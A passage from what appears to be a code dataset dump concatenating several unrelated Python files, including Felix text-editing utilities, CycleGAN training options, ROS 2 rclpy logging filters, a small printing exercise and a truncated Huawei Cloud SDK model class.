WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Utility functions for Felix.\"\"\"\n\nimport json\nfrom typing import Callable, Iterator, Mapping, MutableSequence, NamedTuple, Optional, Sequence, Tuple, Union\n\nfrom absl import logging\nfrom six import with_metaclass\nimport tensorflow as tf\n\nimport felix_constants as constants\nimport tokenization\n\nFeedDict = Mapping[str, Sequence[Sequence[float]]]\nSourceTargetPair = Tuple[MutableSequence[str], str]\n\n\ndef get_token_list(text):\n \"\"\"Returns a list of tokens.\n\n This function expects that the tokens in the text are separated by space\n character(s). Example: \"ca n't , touch\". This is the case at least for the\n public DiscoFuse and WikiSplit datasets.\n\n Args:\n text: String to be split into tokens.\n \"\"\"\n return text.split()\n\n\ndef build_feed_dict(tokens,\n tokenizer,\n target_tokens = None,\n max_seq_length = 128,\n max_predictions_per_seq = 20):\n \"\"\"Returns a dictionary used for predicting/training the insertion model.\n\n Converts a list of source tokens, containing masks, to a dictionary of\n features used by a TF model. 
If a target sequence is provided, then the\n targets for the MASKs are set.\n\n Args:\n tokens: Input tokens, with mask tokens.\n tokenizer: Tokenizer used to convert tokens to IDs.\n target_tokens: (Optional) The targets of the mask tokens.\n max_seq_length: Maximum sequence length.\n max_predictions_per_seq: Maximum number of mask tokens.\n\n Returns:\n Dictionary with model features or None if `len(tokens) > max_seq_length` or\n if the number of MASKs is larger than `max_predictions_per_seq`.\n \"\"\"\n mask_position = []\n mask_target_id = []\n mask_target_weight = []\n\n for idx, token in enumerate(tokens):\n if token != constants.MASK:\n continue\n\n mask_position.append(idx)\n if target_tokens:\n mask_target_id += tokenizer.convert_tokens_to_ids([target_tokens[idx]])\n else:\n mask_target_id.append(0)\n mask_target_weight.append(1.0)\n\n # Deleted tokens (bracketed by unused) should have a segment_id of 2.\n unused = False\n segment_ids = []\n for token in tokens:\n if token == constants.DELETE_SPAN_START or unused:\n unused = True\n segment_ids.append(2)\n else:\n segment_ids.append(0)\n if token == constants.DELETE_SPAN_END:\n unused = False\n input_mask = [1] * len(tokens)\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n assert len(segment_ids) == len(input_ids)\n # Padding.\n while len(input_ids) < max_seq_length:\n segment_ids.append(0)\n input_ids.append(0)\n input_mask.append(0)\n\n if len(input_ids) > max_seq_length:\n input_ids = input_ids[:max_seq_length]\n segment_ids = segment_ids[:max_seq_length]\n input_mask = input_mask[:max_seq_length]\n #return None\n\n assert len(input_ids) == max_seq_length, \"len(input_ids) = {}\".format(\n len(input_ids))\n assert len(input_mask) == max_seq_length, \"len(input_mask) = {}\".format(\n len(input_mask))\n assert len(segment_ids) == max_seq_length, \"len(segment_ids) = {}\".format(\n len(segment_ids))\n\n if len(mask_position) > max_predictions_per_seq:\n mask_position = mask_position[:max_predictions_per_seq]\n #return None\n while len(mask_position) < max_predictions_per_seq:\n mask_target_weight.append(0)\n mask_position.append(0)\n mask_target_id.append(0)\n\n feed_dict = {\n \"input_ids\": [input_ids],\n \"input_mask\": [input_mask],\n \"segment_ids\": [segment_ids],\n \"masked_lm_positions\": [mask_position],\n \"masked_lm_ids\": [mask_target_id],\n \"masked_lm_weights\": [mask_target_weight],\n }\n\n return feed_dict\n\n\ndef _int_feature(values):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n\n\ndef _float_feature(values):\n return tf.train.Feature(float_list=tf.train.FloatList(value=values))\n\n\ndef _text_feature(values):\n return tf.train.Feature(\n bytes_list=tf.train.BytesList(\n value=[element.encode(\"utf8\") for element in values]))\n\n\ndef feed_dict_to_tf_example(feed_dict,\n source = None,\n target = None):\n \"\"\"Returns a TF example for MLM insertion model.\"\"\"\n features = {\n \"input_ids\": _int_feature(feed_dict[\"input_ids\"][0]),\n \"input_mask\": _int_feature(feed_dict[\"input_mask\"][0]),\n \"segment_ids\": _int_feature(feed_dict[\"segment_ids\"][0]),\n \"masked_lm_positions\": _int_feature(feed_dict[\"masked_lm_positions\"][0]),\n \"masked_lm_ids\": _int_feature(feed_dict[\"masked_lm_ids\"][0]),\n \"masked_lm_weights\": _float_feature(feed_dict[\"masked_lm_weights\"][0]),\n }\n if source:\n features[\"text_source\"] = _text_feature([source])\n if target:\n features[\"text_target\"] = _text_feature([target])\n return 
tf.train.Example(features=tf.train.Features(feature=features))\n\n\nclass Features(NamedTuple):\n \"\"\"A data holder for various features that can be read from files.\"\"\"\n source: MutableSequence[str]\n target: str\n output_variant_id: Optional[int] = None\n\n @staticmethod\n def from_source_target_pair(pair):\n return Features(source=pair[0], target=pair[1])\n\nSourcesAndFeaturesPair = Tuple[MutableSequence[str], Features]\n\n\ndef text_file_iterator(fname_pattern):\n \"\"\"Returns an iterator over lines of the files covered by fname_pattern.\"\"\"\n for fname in get_filenames(fname_pattern):\n with tf.io.gfile.GFile(fname, \"r\") as f:\n for line in f:\n yield line\n\n\ndef skip_header_text_file_iterator(fname_pattern):\n \"\"\"Similar to text_file_iterator, but skipping the first line of each file.\"\"\"\n for fname in get_filenames(fname_pattern):\n tf.io.gfile.GFile(fname)\n it = tf.io.gfile.GFile(fname, \"r\")\n it.next() # skip the header line\n for line in it:\n yield line\n\n\ndef get_parse_tsv_line_fn(\n return_none_on_error = False,\n reverse = False):\n \"\"\"A higher-order function producing TSV line-parsing functions.\n\n Args:\n return_none_on_error: Whether to return None on encountering an error (such\n as too few TSV columns) rather than raising an Error.\n reverse: When True, returns ([`target`], `source`) instead of ([`source`],\n `target`). Useful for working with \"reverse\" (a.k.a. \"noise\" models that\n go from `target` to `source`.\n\n Returns:\n A parsing function that goes from a text line to a ([source], target) pair\n (or a ([`target`], `source`) pair when `reverse`=True).\n \"\"\"\n\n def parse_tsv_line(line):\n \"\"\"Parses the first two columns, `source` and `target`, from a TSV line.\n\n Any further columns are ignored.\n\n Args:\n line: A text line.\n\n Returns:\n a tuple ([source], target), with `source` being wrapped in a list.\n\n Raises:\n ValueError: when the line has less than two TSV columns and\n `return_none_on_error`=False.\n \"\"\"\n split = line.rstrip(\"\\n\").split(\"\\t\")\n if len(split) < 2:\n message = 'TSV line has less than two tab-delimited fields:\\n\"{}\"'.format(\n line)\n if return_none_on_error:\n logging.warning(message)\n return None\n else:\n raise ValueError(message)\n source, target = split[:2]\n if reverse:\n return [target], source\n else:\n return [source], target\n\n return parse_tsv_line\n\n\ndef parse_discofuse_line(line):\n \"\"\"Parses a DiscoFuse example from a line from a TSV file.\n\n The documentation for this format:\n https://github.com/google-research-datasets/discofuse#data-format\n\n Args:\n line: A line from a TSV file.\n\n Returns:\n A pair (, ).\n \"\"\"\n coherent_1, coherent_2, incoherent_1, incoherent_2, _, _, _, _ = (\n line.rstrip(\"\\n\").split(\"\\t\"))\n # Strip because the second coherent sentence might be empty.\n fusion = (coherent_1 + \" \" + coherent_2).strip()\n return [incoherent_1, incoherent_2], fusion\n\n\ndef parse_iterate_plain_line(line):\n return _parse_iterate_line(line, with_intent=False)\n\n\ndef parse_iterate_intent_line(line):\n return _parse_iterate_line(line, with_intent=True)\n\n\ndef _parse_iterate_line(line, with_intent=False):\n \"\"\"Parses a IteraTE example from a line from a (line-by-line) JSON file.\n\n Args:\n line: A JSON line from a line-by-line JSON file.\n\n Returns:\n A tuple ([source], target), with `source` being wrapped in a list.\n \"\"\"\n json_line = json.loads(line)\n if with_intent:\n src = json_line[\"before_sent_with_intent\"]\n else:\n src = 
json_line[\"before_sent\"]\n tgt = json_line[\"after_sent\"]\n return [src], tgt\n\n\ndef yield_sources_and_targets(\n input_file_pattern,\n input_format,\n source_key = None,\n target_key = None):\n \"\"\"Produces an iterator over pairs (source list, targets) parsed from a file.\n\n Args:\n input_file_pattern: Path/pattern to the input file(s).\n input_format: Format of the input file.\n source_key: Source text feature name. Only considered when\n `input_format=sstable`.\n target_key: Target text feature name. Only considered when\n `input_format=sstable`.\n\n Yields:\n Pairs of (list of source texts, target text).\n \"\"\"\n data_spec = {\n \"wikisplit\": (text_file_iterator, get_parse_tsv_line_fn()),\n \"discofuse\": (skip_header_text_file_iterator, parse_discofuse_line),\n \"IteraTE_Plain\": (skip_header_text_file_iterator, parse_iterate_plain_line),\n \"IteraTE_Intent\": (skip_header_text_file_iterator, parse_iterate_intent_line),\n }\n\n if input_format not in data_spec:\n raise ValueError(\"Unsupported input_format: {}\".format(input_format))\n\n file_iterator_fn, parse_fn = data_spec[input_format]\n for item in file_iterator_fn(input_file_pattern):\n # Pytype correctly infers possible types for `item`, but does not handle\n # well the various possible signatures of `parse_fn`.\n parsed_item = parse_fn(item) # pytype: disable=wrong-arg-types\n if parsed_item is not None:\n yield parsed_item\n\n\ndef get_filenames(patterns):\n \"\"\"Obtains a list of filenames corresponding to the pattern.\n\n Supports patterns, as well as plain\n file names, as well as comma-separated lists of patterns.\n\n Caveat: Will not work if the patterns have commas (',') in them.\n\n Args:\n patterns: File pattern or comma-separated patterns.\n\n Raises:\n RuntimeError: If `patterns` is valid but cannot be expanded/does not match\n any files.\n\n Returns:\n list of individual paths to each file.\n \"\"\"\n all_files = []\n for pattern in patterns.split(\",\"):\n # points to a specific file.\n files = tf.io.gfile.glob(pattern)\n if not files:\n raise RuntimeError(\"Could not find files matching: %s\" % pattern)\n all_files.extend(files)\n\n return all_files\n\n\ndef read_label_map(\n path,\n use_str_keys = False):\n \"\"\"Returns label map read from the given path.\n\n Args:\n path: Path to the label map file.\n use_str_keys: Whether to use label strings as keys instead of\n (base tag, num insertions) tuple keys. 
The latter is only used by\n FelixInsert.\n \"\"\"\n label_map = {}\n with tf.io.gfile.GFile(path) as f:\n if path.endswith(\".json\"):\n label_map = json.load(f)\n else:\n for tag in f:\n tag = tag.strip()\n # Empty lines are skipped.\n if tag:\n if tag in label_map:\n raise ValueError(\"Duplicate label in label_map: {}\".format(tag))\n label_map[tag] = len(label_map)\n if not use_str_keys:\n new_label_map = {}\n for key, val in label_map.items():\n if \"|\" in key:\n pos_pipe = key.index(\"|\")\n new_key = (key[:pos_pipe], int(key[pos_pipe + 1:]))\n else:\n new_key = (key, 0)\n new_label_map[new_key] = val\n label_map = new_label_map\n return label_map\n"} {"ext": "py", "sha": "1a304f7ea1d05edd53437f4b33cf05368d9e2c67", "content": "import argparse\nimport os\nfrom util import util\nimport torch\nimport models\nimport data\n\n\nclass BaseOptions():\n \"\"\"This class defines options used during both training and test time.\n\n It also implements several helper functions such as parsing, printing, and saving the options.\n It also gathers additional options defined in functions in both dataset class and model class.\n \"\"\"\n\n def __init__(self):\n \"\"\"Reset the class; indicates the class hasn't been initailized\"\"\"\n self.initialized = False\n\n def initialize(self, parser):\n \"\"\"Define the common options that are used in both training and test.\"\"\"\n # basic parameters\n parser.add_argument('--dataroot', required=True, help='path to images (should have subfolders trainA, trainB, valA, valB, etc)')\n parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models')\n parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\n parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')\n # model parameters\n parser.add_argument('--model', type=str, default='cycle_gan', help='chooses which model to use. [cycle_gan | pix2pix | test | colorization]')\n parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')\n parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')\n parser.add_argument('--netD', type=str, default='basic', help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. 
n_layers allows you to specify the layers in the discriminator')\n parser.add_argument('--netG', type=str, default='resnet_9blocks', help='specify generator architecture [resnet_9blocks | resnet_6blocks | unet_256 | unet_128]')\n parser.add_argument('--n_layers_D', type=int, default=3, help='only used if netD==n_layers')\n parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization [instance | batch | none]')\n parser.add_argument('--init_type', type=str, default='normal', help='network initialization [normal | xavier | kaiming | orthogonal]')\n parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.')\n parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')\n parser.add_argument('--conv_type', type=str, default='conv2d', help='conv type [conv2d | dcn_v1 | dcn_v2 | mixed]')\n # dataset parameters\n parser.add_argument('--dataset_mode', type=str, default='unaligned', help='chooses how datasets are loaded. [unaligned | aligned | single | colorization]')\n parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')\n parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')\n parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data')\n parser.add_argument('--batch_size', type=int, default=1, help='input batch size')\n parser.add_argument('--load_size', type=int, default=286, help='scale images to this size')\n parser.add_argument('--crop_size', type=int, default=256, help='then crop to this size')\n parser.add_argument('--max_dataset_size', type=int, default=float(\"inf\"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')\n parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')\n parser.add_argument('--no_flip', action='store_true', help='if specified, do not flip the images for data augmentation')\n parser.add_argument('--display_winsize', type=int, default=256, help='display window size for both visdom and HTML')\n # additional parameters\n parser.add_argument('--epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model')\n parser.add_argument('--load_iter', type=int, default='0', help='which iteration to load? 
if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')\n parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')\n parser.add_argument('--suffix', default='', type=str, help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')\n self.initialized = True\n return parser\n\n def gather_options(self):\n \"\"\"Initialize our parser with basic options(only once).\n Add additional model-specific and dataset-specific options.\n These options are defined in the function\n in model and dataset classes.\n \"\"\"\n if not self.initialized: # check if it has been initialized\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser = self.initialize(parser)\n\n # get the basic options\n opt, _ = parser.parse_known_args()\n\n # modify model-related parser options\n model_name = opt.model\n model_option_setter = models.get_option_setter(model_name)\n parser = model_option_setter(parser, self.isTrain)\n opt, _ = parser.parse_known_args() # parse again with new defaults\n\n # modify dataset-related parser options\n dataset_name = opt.dataset_mode\n dataset_option_setter = data.get_option_setter(dataset_name)\n parser = dataset_option_setter(parser, self.isTrain)\n\n # save and return the parser\n self.parser = parser\n return parser.parse_args()\n\n def print_options(self, opt):\n \"\"\"Print and save options\n\n It will print both current options and default values(if different).\n It will save options into a text file / [checkpoints_dir] / opt.txt\n \"\"\"\n message = ''\n message += '----------------- Options ---------------\\n'\n for k, v in sorted(vars(opt).items()):\n comment = ''\n default = self.parser.get_default(k)\n if v != default:\n comment = '\\t[default: %s]' % str(default)\n message += '{:>25}: {:<30}{}\\n'.format(str(k), str(v), comment)\n message += '----------------- End -------------------'\n print(message)\n\n # save to the disk\n expr_dir = os.path.join(opt.checkpoints_dir, opt.name)\n util.mkdirs(expr_dir)\n file_name = os.path.join(expr_dir, '{}_opt.txt'.format(opt.phase))\n with open(file_name, 'wt') as opt_file:\n opt_file.write(message)\n opt_file.write('\\n')\n\n def parse(self):\n \"\"\"Parse our options, create checkpoints directory suffix, and set up gpu device.\"\"\"\n opt = self.gather_options()\n opt.isTrain = self.isTrain # train or test\n\n # process opt.suffix\n if opt.suffix:\n suffix = ('_' + opt.suffix.format(**vars(opt))) if opt.suffix != '' else ''\n opt.name = opt.name + suffix\n\n self.print_options(opt)\n\n # set gpu ids\n str_ids = opt.gpu_ids.split(',')\n opt.gpu_ids = []\n for str_id in str_ids:\n id = int(str_id)\n if id >= 0:\n opt.gpu_ids.append(id)\n if len(opt.gpu_ids) > 0:\n torch.cuda.set_device(opt.gpu_ids[0])\n\n self.opt = opt\n return self.opt\n"} {"ext": "py", "sha": "1a304fb8b4003bdc8146cbb2fd665e2bee8eff90", "content": "# Copyright 2017 Open Source Robotics Foundation, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific 
language governing permissions and\n# limitations under the License.\n\n\nfrom collections import namedtuple\nfrom collections import OrderedDict\nimport inspect\nimport os\n\nfrom rclpy.clock import Clock\nfrom rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy\n\n# Known filenames from which logging methods can be called (will be ignored in `_find_caller`).\n_internal_callers = []\n# This will cause rclpy filenames to be registered in `_internal_callers` on first logging call.\n_populate_internal_callers = True\n\n\ndef _find_caller(frame):\n \"\"\"Get the first calling frame that is outside of rclpy.\"\"\"\n global _populate_internal_callers\n global _internal_callers\n if _populate_internal_callers:\n # Populate the list of internal filenames from which logging methods can be called.\n # This has to be done from within a function to avoid cyclic module imports.\n import rclpy.logging\n # Extend the list to preserve any filenames that may have been added by third parties.\n # Note: the call to `realpath` will also resolve mixed slashes that can result on Windows.\n _internal_callers.extend([\n os.path.realpath(__file__),\n os.path.realpath(rclpy.logging.__file__),\n ])\n _populate_internal_callers = False\n\n file_path = os.path.realpath(inspect.getframeinfo(frame).filename)\n while any(f in file_path for f in _internal_callers):\n frame = frame.f_back\n file_path = os.path.realpath(inspect.getframeinfo(frame).filename)\n return frame\n\n\nclass CallerId(\n namedtuple('CallerId', ['function_name', 'file_path', 'line_number', 'last_index'])):\n\n def __new__(cls, frame=None):\n if not frame:\n frame = _find_caller(inspect.currentframe())\n return super(CallerId, cls).__new__(\n cls,\n function_name=frame.f_code.co_name,\n file_path=os.path.abspath(inspect.getframeinfo(frame).filename),\n line_number=frame.f_lineno,\n last_index=frame.f_lasti, # To distinguish between two callers on the same line\n )\n\n\nclass LoggingFilter:\n \"\"\"Base class for logging filters.\"\"\"\n\n \"\"\"\n Parameters of a filter and their default value, if appropriate.\n\n A default value of None makes a parameter required.\n \"\"\"\n params = {}\n\n \"\"\"\n Initialize the context of a logging call, e.g. 
declare variables needed for\n determining the log condition and add them to the context.\n \"\"\"\n @classmethod\n def initialize_context(cls, context, **kwargs):\n # Store all parameters in the context so we can check that users never try to change them.\n for param in cls.params:\n context[param] = kwargs.get(param, cls.params[param])\n if context[param] is None:\n raise TypeError(\n 'Required parameter \"{0}\" was not specified for logging filter \"{1}\"'\n .format(param, cls.__name__))\n\n \"\"\"\n Decide if it's appropriate to log given a context, and update the context accordingly.\n \"\"\"\n @staticmethod\n def should_log(context):\n return True\n\n\nclass Once(LoggingFilter):\n \"\"\"Ignore all log calls except the first one.\"\"\"\n\n params = {\n 'once': None,\n }\n\n @classmethod\n def initialize_context(cls, context, **kwargs):\n super(Once, cls).initialize_context(context, **kwargs)\n context['has_been_logged_once'] = False\n\n @staticmethod\n def should_log(context):\n logging_condition = False\n if not context['has_been_logged_once']:\n logging_condition = True\n context['has_been_logged_once'] = True\n return logging_condition\n\n\nclass Throttle(LoggingFilter):\n \"\"\"Ignore log calls if the last call is not longer ago than the specified duration.\"\"\"\n\n params = {\n 'throttle_duration_sec': None,\n 'throttle_time_source_type': Clock(),\n }\n\n @classmethod\n def initialize_context(cls, context, **kwargs):\n super(Throttle, cls).initialize_context(context, **kwargs)\n context['throttle_last_logged'] = 0\n if not isinstance(context['throttle_time_source_type'], Clock):\n raise ValueError(\n 'Received throttle_time_source_type of \"{0}\" '\n 'is not a clock instance'\n .format(context['throttle_time_source_type']))\n\n @staticmethod\n def should_log(context):\n logging_condition = True\n now = context['throttle_time_source_type'].now().nanoseconds\n next_log_time = context['throttle_last_logged'] + (context['throttle_duration_sec'] * 1e+9)\n logging_condition = now >= next_log_time\n if logging_condition:\n context['throttle_last_logged'] = now\n return logging_condition\n\n\nclass SkipFirst(LoggingFilter):\n \"\"\"Ignore the first log call but process all subsequent calls.\"\"\"\n\n params = {\n 'skip_first': None,\n }\n\n @classmethod\n def initialize_context(cls, context, **kwargs):\n super(SkipFirst, cls).initialize_context(context, **kwargs)\n context['first_has_been_skipped'] = False\n\n @staticmethod\n def should_log(context):\n logging_condition = True\n if not context['first_has_been_skipped']:\n logging_condition = False\n context['first_has_been_skipped'] = True\n return logging_condition\n\n\n# The ordering of this dictionary defines the order in which filters will be processed.\nsupported_filters = OrderedDict()\nsupported_filters['throttle'] = Throttle\nsupported_filters['skip_first'] = SkipFirst\nsupported_filters['once'] = Once\n\n\ndef get_filters_from_kwargs(**kwargs):\n \"\"\"\n Determine which filters have had parameters specified in the given keyword arguments.\n\n Returns the list of filters using the order specified by `supported_filters`.\n \"\"\"\n detected_filters = []\n all_supported_params = []\n for supported_filter, filter_class in supported_filters.items():\n filter_params = filter_class.params.keys()\n all_supported_params.extend(filter_params)\n if any(kwargs.get(param_name) for param_name in filter_params):\n detected_filters.append(supported_filter)\n # Check that all required parameters (with no default value) have been specified\n 
for detected_filter in detected_filters:\n for param_name, default_value in supported_filters[detected_filter].params.items():\n if param_name in kwargs:\n continue\n\n # Param not specified; use the default.\n if default_value is None:\n raise TypeError(\n 'required parameter \"{0}\" not specified '\n 'but is required for the the logging filter \"{1}\"'.format(\n param_name, detected_filter))\n kwargs[param_name] = default_value\n for kwarg in kwargs:\n if kwarg not in all_supported_params:\n raise TypeError(\n 'parameter \"{0}\" is not one of the recognized logging options \"{1}\"'\n .format(kwarg, all_supported_params)\n )\n return detected_filters\n\n\nclass RcutilsLogger:\n\n def __init__(self, name=''):\n self.name = name\n self.contexts = {}\n\n def get_child(self, name):\n if not name:\n raise ValueError('Child logger name must not be empty.')\n if self.name:\n # Prepend the name of this logger\n name = self.name + '.' + name\n return RcutilsLogger(name=name)\n\n def set_level(self, level):\n from rclpy.logging import LoggingSeverity\n level = LoggingSeverity(level)\n return _rclpy.rclpy_logging_set_logger_level(self.name, level)\n\n def get_effective_level(self):\n from rclpy.logging import LoggingSeverity\n level = LoggingSeverity(\n _rclpy.rclpy_logging_get_logger_effective_level(self.name))\n return level\n\n def is_enabled_for(self, severity):\n from rclpy.logging import LoggingSeverity\n severity = LoggingSeverity(severity)\n return _rclpy.rclpy_logging_logger_is_enabled_for(self.name, severity)\n\n def log(self, message, severity, **kwargs):\n r\"\"\"\n Log a message with the specified severity.\n\n The message will not be logged if:\n * the logger is not enabled for the message's severity (the message severity is less than\n the level of the logger), or\n * a logging filter causes the message to be skipped.\n\n .. 
note::\n Logging filters will only be evaluated if the logger is enabled for the message's\n severity.\n\n :param message str: message to log.\n :param severity: severity of the message.\n :type severity: :py:class:LoggingSeverity\n :keyword name str: name of the logger to use.\n :param \\**kwargs: optional parameters for logging filters (see below).\n\n :Keyword Arguments:\n * *throttle_duration_sec* (``float``) --\n Duration of the throttle interval for the :py:class:Throttle: filter.\n * *throttle_time_source_type* (``str``) --\n Optional time source type for the :py:class:Throttle: filter (default of\n ``RCUTILS_STEADY_TIME``)\n * *skip_first* (``bool``) --\n If True, enable the :py:class:SkipFirst: filter.\n * *once* (``bool``) --\n If True, enable the :py:class:Once: filter.\n :returns: False if a filter caused the message to not be logged; True otherwise.\n :raises: TypeError on invalid filter parameter combinations.\n :raises: ValueError on invalid parameters values.\n :rtype: bool\n \"\"\"\n # Gather context info and check filters only if the severity is appropriate.\n if not self.is_enabled_for(severity):\n return False\n\n from rclpy.logging import LoggingSeverity\n severity = LoggingSeverity(severity)\n\n name = kwargs.pop('name', self.name)\n\n # Infer the requested log filters from the keyword arguments\n detected_filters = get_filters_from_kwargs(**kwargs)\n\n # Get/prepare the context corresponding to the caller.\n caller_id = CallerId()\n if caller_id not in self.contexts:\n context = {'name': name, 'severity': severity}\n for detected_filter in detected_filters:\n if detected_filter in supported_filters:\n supported_filters[detected_filter].initialize_context(context, **kwargs)\n context['filters'] = detected_filters\n self.contexts[caller_id] = context\n else:\n context = self.contexts[caller_id]\n # Don't support any changes to the logger.\n if severity != context['severity']:\n raise ValueError('Logger severity cannot be changed between calls.')\n if name != context['name']:\n raise ValueError('Logger name cannot be changed between calls.')\n if detected_filters != context['filters']:\n raise ValueError('Requested logging filters cannot be changed between calls.')\n for detected_filter in detected_filters:\n filter_params = supported_filters[detected_filter].params\n if any(context[p] != kwargs.get(p, filter_params[p]) for p in filter_params):\n raise ValueError(\n 'Logging filter parameters cannot be changed between calls.')\n\n # Check if any filter determines the message shouldn't be processed.\n # Note(dhood): even if a message doesn't get logged, a filter might still update its state\n # as if it had been. 
This matches the behavior of the C logging macros provided by rcutils.\n for logging_filter in context['filters']:\n if not supported_filters[logging_filter].should_log(context):\n return False\n\n # Call the relevant function from the C extension.\n _rclpy.rclpy_logging_rcutils_log(\n severity, name, message,\n caller_id.function_name, caller_id.file_path, caller_id.line_number)\n return True\n\n def debug(self, message, **kwargs):\n \"\"\"Log a message with `DEBUG` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.DEBUG, **kwargs)\n\n def info(self, message, **kwargs):\n \"\"\"Log a message with `INFO` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.INFO, **kwargs)\n\n def warning(self, message, **kwargs):\n \"\"\"Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.WARN, **kwargs)\n\n def warn(self, message, **kwargs):\n \"\"\"\n Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:.\n\n Deprecated in favor of :py:classmethod:RcutilsLogger.warning:.\n \"\"\"\n return self.warning(message, **kwargs)\n\n def error(self, message, **kwargs):\n \"\"\"Log a message with `ERROR` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.ERROR, **kwargs)\n\n def fatal(self, message, **kwargs):\n \"\"\"Log a message with `FATAL` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.FATAL, **kwargs)\n"} {"ext": "py", "sha": "1a30507e3719dd13640618cadf10306d4426c321", "content": "def escreva(txt):\n vzs = int(len(txt)) + 2\n print('~' * vzs)\n print(f' {txt} ')\n print('~' * vzs)\n\n\nescreva('Ian Stigliano')\nescreva('Aprenda Python')\nescreva('Curso em Python do Guanabara')\nescreva('Ian')"} {"ext": "py", "sha": "1a30509d30a1bf83e042370ff613f420542870b5", "content": "# coding: utf-8\n\nimport pprint\nimport re\n\nimport six\n\n\n\n\n\nclass ImageDetectionResultDetailPolitics:\n\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n\n sensitive_list = []\n\n openapi_types = {\n 'confidence': 'float',\n 'label': 'str',\n 'face_detail': 'ImageDetectionResultDetailFaceDetail'\n }\n\n attribute_map = {\n 'confidence': 'confidence',\n 'label': 'label',\n 'face_detail': 'face_detail'\n }\n\n def __init__(self, confidence=None, label=None, face_detail=None):\n \"\"\"ImageDetectionResultDetailPolitics - a model defined in huaweicloud sdk\"\"\"\n \n \n\n self._confidence = None\n self._label = None\n self._face_detail = None\n self.discriminator = None\n\n if confidence is not None:\n self.confidence = confidence\n if label is not None:\n self.label = label\n if face_detail is not None:\n self.face_detail = face_detail\n\n @property\n def confidence(self):\n \"\"\"Gets the confidence of this ImageDetectionResultDetailPolitics.\n\n\n :return: The confidence of this ImageDetectionResultDetailPolitics.\n :rtype: float\n \"\"\"\n return self._confidence\n\n @confidence.setter\n def confidence(self, confidence):\n \"\"\"Sets the confidence of this 
ImageDetectionResultDetailPolitics.\n\n\n :param confidence: The confidence of this ImageDetectionResultDetailPolitics.\n :type: float\n \"\"\"\n self._confidence = confidence\n\n @property\n def label(self):\n \"\"\"Gets the label of this ImageDetectionResultDetailPolitics.\n\n\n :return: The label of this ImageDetectionResultDetailPolitics.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this ImageDetectionResultDetailPolitics.\n\n\n :param label: The label of this ImageDetectionResultDetailPolitics.\n :type: str\n \"\"\"\n self._label = label\n\n @property\n def face_detail(self):\n \"\"\"Gets the face_detail of this ImageDetectionResultDetailPolitics.\n\n\n :return: The face_detail of this ImageDetectionResultDetailPolitics.\n :rtype: ImageDetectionResultDetailFaceDetail\n \"\"\"\n return self._face_detail\n\n @face_detail.setter\n def face_detail(self, face_detail):\n \"\"\"Sets the face_detail of this ImageDetectionResultDetailPolitics.\n\n\n :param face_detail: The face_detail of this ImageDetectionResultDetailPolitics.\n :type: ImageDetectionResultDetailFaceDetail\n \"\"\"\n self._face_detail = face_detail\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n 